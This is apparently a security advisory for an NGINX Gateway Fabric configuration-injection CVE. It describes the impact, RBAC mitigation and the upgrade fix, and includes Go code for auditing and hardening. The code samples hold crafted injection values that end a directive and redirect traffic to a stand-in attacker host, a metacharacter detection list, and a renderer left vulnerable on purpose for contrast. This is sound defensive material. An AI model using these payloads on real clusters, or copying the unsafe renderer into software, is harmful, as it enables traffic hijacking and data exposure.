Mallory

NGINX Gateway Fabric configuration directive injection via CRD fields

Identifiers: CVE-2026-11311, CWE-74

CVE-2026-11311 is a high-severity injection vulnerability (CWE-74) in the NGINX configuration generator of NGINX Gateway Fabric when NGINX Plus is the data plane. String values from the NginxProxy serverTokens field and the AuthenticationFilter extraAuthArgs field (both defined by NGINX Gateway Fabric CRDs) are rendered verbatim into the generated NGINX configuration, with no sanitization or escaping. An authenticated user with Kubernetes RBAC rights to create or modify those resources can therefore supply a value that terminates the intended directive and injects arbitrary NGINX directives into the configuration. This is a control-plane vulnerability: the trigger is management-plane configuration in Kubernetes, not data-plane request handling.

Analyst brief: Impact, mitigation & remediation

Impact


An authenticated attacker with rights to modify NginxProxy or AuthenticationFilter resources can alter the generated NGINX configuration by injecting arbitrary directives. Reported consequences include unauthorized proxy behaviour, exposure of sensitive data from the NGINX pod filesystem, proxying or redirecting traffic to attacker-controlled endpoints, and denial of service when the injected configuration fails validation and blocks NGINX reloads or otherwise destabilizes the service. The core impact is loss of configuration integrity on the cluster's ingress path, with confidentiality, integrity and availability consequences for every workload behind NGINX Gateway Fabric.

Mitigation


Until the fix is deployed, limit who can create or modify NginxProxy and AuthenticationFilter resources to trusted cluster administrators. Kubernetes RBAC works at the resource level, not the field level, so the whole NginxProxy and AuthenticationFilter object has to be treated as privileged even though only the serverTokens and extraAuthArgs fields are at issue. Review Role and ClusterRole bindings that grant create, update or patch on these resources, and watch the generated NGINX configuration and NGINX reload failures for unexpected directives; a failed reload right after a change to one of these objects is a likely sign of an injected value. Where possible, keep untrusted users out of any workflow (GitOps pipelines, self-service portals) that can write to these fields. An admission policy that rejects values containing NGINX configuration metacharacters (semicolons, braces, quotes, newlines, dollar signs) is a further stop-gap.
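A quick audit of what is already in the cluster, as an added Go example (not part of this advisory or of NGINX Gateway Fabric): it walks a `kubectl get ... -o json` List and flags NginxProxy and AuthenticationFilter objects whose serverTokens or extraAuthArgs values contain characters that could terminate or extend an NGINX directive. The sample List is constructed, the field paths under spec are assumptions (the audit matches on key name at any depth, so the exact schema path does not matter), and the plural resource names in the usage note are assumed.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strings"
)

// Field names the advisory identifies as being rendered into nginx.conf. The
// audit matches on key name at any depth, so the exact path under spec is not
// assumed.
var sensitiveFields = map[string]bool{"serverTokens": true, "extraAuthArgs": true}

// Characters that let a value end the current directive, open or close a block,
// start a comment, break out of quoting, or expand an nginx variable.
const nginxConfMetachars = ";{}#\"'\\$\r\n"

type Finding struct {
	Kind, Namespace, Name, Field, Value string
}

// walk descends through decoded JSON and reports every string stored under a
// sensitive key.
func walk(node any, visit func(key, val string)) {
	switch n := node.(type) {
	case map[string]any:
		for k, v := range n {
			if s, ok := v.(string); ok && sensitiveFields[k] {
				visit(k, s)
			}
			walk(v, visit)
		}
	case []any:
		for _, v := range n {
			walk(v, visit)
		}
	}
}

// AuditList takes a kubectl List document (kubectl get ... -o json) and returns
// the items whose sensitive fields contain configuration metacharacters.
func AuditList(listJSON []byte) ([]Finding, error) {
	var list struct {
		Items []map[string]any `json:"items"`
	}
	if err := json.Unmarshal(listJSON, &list); err != nil {
		return nil, fmt.Errorf("decoding kubectl output: %w", err)
	}
	var findings []Finding
	for _, item := range list.Items {
		kind, _ := item["kind"].(string)
		meta, _ := item["metadata"].(map[string]any)
		ns, _ := meta["namespace"].(string)
		name, _ := meta["name"].(string)
		walk(item["spec"], func(key, val string) {
			if strings.ContainsAny(val, nginxConfMetachars) {
				findings = append(findings, Finding{kind, ns, name, key, val})
			}
		})
	}
	return findings, nil
}

// Constructed sample shaped like kubectl List output. Field paths under spec
// are assumptions for illustration; two of the four values are crafted so they
// would end the directive and inject another one.
const sampleList = `{
  "kind": "List",
  "items": [
    {"kind": "NginxProxy", "metadata": {"namespace": "nginx-gateway", "name": "ngf-proxy-config"},
     "spec": {"serverTokens": "off"}},
    {"kind": "NginxProxy", "metadata": {"namespace": "team-a", "name": "proxy-override"},
     "spec": {"serverTokens": "off;\n    return 301 http://attacker.example/"}},
    {"kind": "AuthenticationFilter", "metadata": {"namespace": "team-b", "name": "api-auth"},
     "spec": {"extraAuthArgs": "realm=api"}},
    {"kind": "AuthenticationFilter", "metadata": {"namespace": "team-b", "name": "api-auth-bad"},
     "spec": {"extraAuthArgs": "realm=api;\n    autoindex on"}}
  ]
}`

func main() {
	findings, err := AuditList([]byte(sampleList))
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Printf("%s %s/%s: %s=%q\n", f.Kind, f.Namespace, f.Name, f.Field, f.Value)
	}
}
```

To run it against a real cluster, replace the sample with the output of `kubectl get nginxproxies,authenticationfilters -A -o json` (assumed plural names). Every hit is either a misconfiguration to correct or an abuse to investigate, and a reload failure on the NGINX pod that follows a change to one of these objects deserves the same attention.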

Remediation


Upgrade NGINX Gateway Fabric to a fixed release: affected versions are 2.3.0 through 2.6.3, and the fix ships in 2.6.4. The fix lies in the configuration generator, which must validate or escape the NginxProxy serverTokens and AuthenticationFilter extraAuthArgs values before rendering them into the NGINX configuration templates. After upgrading, assume compromise: review existing NginxProxy and AuthenticationFilter objects for crafted values, and treat any that are found as evidence that the data plane was under attacker control while the injected configuration was live, including which traffic may have been redirected and what the NGINX pod could read. Software versions that have reached End of Technical Support were not evaluated.
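The bug class behind the description above, and one way to close it in the generator, as an added Go example (NGINX Gateway Fabric's own language); this is not the project's code, and the allowlist policy is an assumption rather than the actual fix in 2.6.4. NGINX Plus accepts a free-form string for server_tokens and expands $variables in it, so the hardened renderer admits the on/off/build keywords or a custom banner restricted to characters that cannot end a directive, open a block, quote, comment, or expand a variable, and rejects everything else instead of trying to escape it. The crafted value is constructed for illustration.

```go
package main

import (
	"errors"
	"fmt"
	"regexp"
	"strings"
)

// renderServerTokensUnsafe mirrors the bug class in the advisory: the CRD string
// is placed in the template verbatim, so a value containing ';' or a newline
// ends the server_tokens directive and the rest is parsed as further config.
func renderServerTokensUnsafe(v string) string {
	return fmt.Sprintf("    server_tokens %s;\n", v)
}

// Assumed validation policy (not the project's actual fix): the nginx keywords,
// or a custom banner (an NGINX Plus feature) built only from characters that
// cannot close a directive, open a block, start a comment, quote, or expand a
// variable.
var (
	serverTokensKeyword = regexp.MustCompile(`^(on|off|build)$`)
	safeBanner          = regexp.MustCompile(`^[A-Za-z0-9 ._/+-]{1,64}$`)
	errUnsafeValue      = errors.New("serverTokens: value contains nginx configuration metacharacters")
)

// renderServerTokensSafe validates, then renders. Rejecting beats escaping here:
// nginx still expands "$var" inside a double-quoted string, and one missed
// escape is the original vulnerability again.
func renderServerTokensSafe(v string) (string, error) {
	switch {
	case serverTokensKeyword.MatchString(v):
		return fmt.Sprintf("    server_tokens %s;\n", v), nil
	case safeBanner.MatchString(v):
		return fmt.Sprintf("    server_tokens \"%s\";\n", v), nil
	default:
		return "", errUnsafeValue
	}
}

// countDirectives approximates how nginx would tokenize the rendered snippet:
// every ';' ends a directive and every '{' opens a block.
func countDirectives(conf string) int {
	return strings.Count(conf, ";") + strings.Count(conf, "{")
}

// Constructed payload for illustration only: terminates server_tokens and
// appends a directive of the author's choosing.
const craftedServerTokens = "off;\n    return 301 http://attacker.example$request_uri"

func main() {
	unsafe := renderServerTokensUnsafe(craftedServerTokens)
	fmt.Printf("unsafe render produced %d directives:\n%s", countDirectives(unsafe), unsafe)
	for _, v := range []string{"off", "Acme Edge", craftedServerTokens} {
		out, err := renderServerTokensSafe(v)
		if err != nil {
			fmt.Printf("rejected %q: %v\n", v, err)
			continue
		}
		fmt.Print(out)
	}
}
```

The same shape applies to extraAuthArgs: decide what the field is allowed to contain, validate against that, and fail the reconcile on anything else, so a rejected object surfaces as a status condition rather than as a broken or hostile nginx.conf.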
Public exploits

No public exploit code has been observed for this vulnerability.

Exposure surface: affected products & vendors

Vendor | Product | Type
F5 | Nginx Gateway Fabric | application
F5 | Nginx Plus | application
Nginx | Gateway Fabric | application

Vendor-confirmed product mapping.
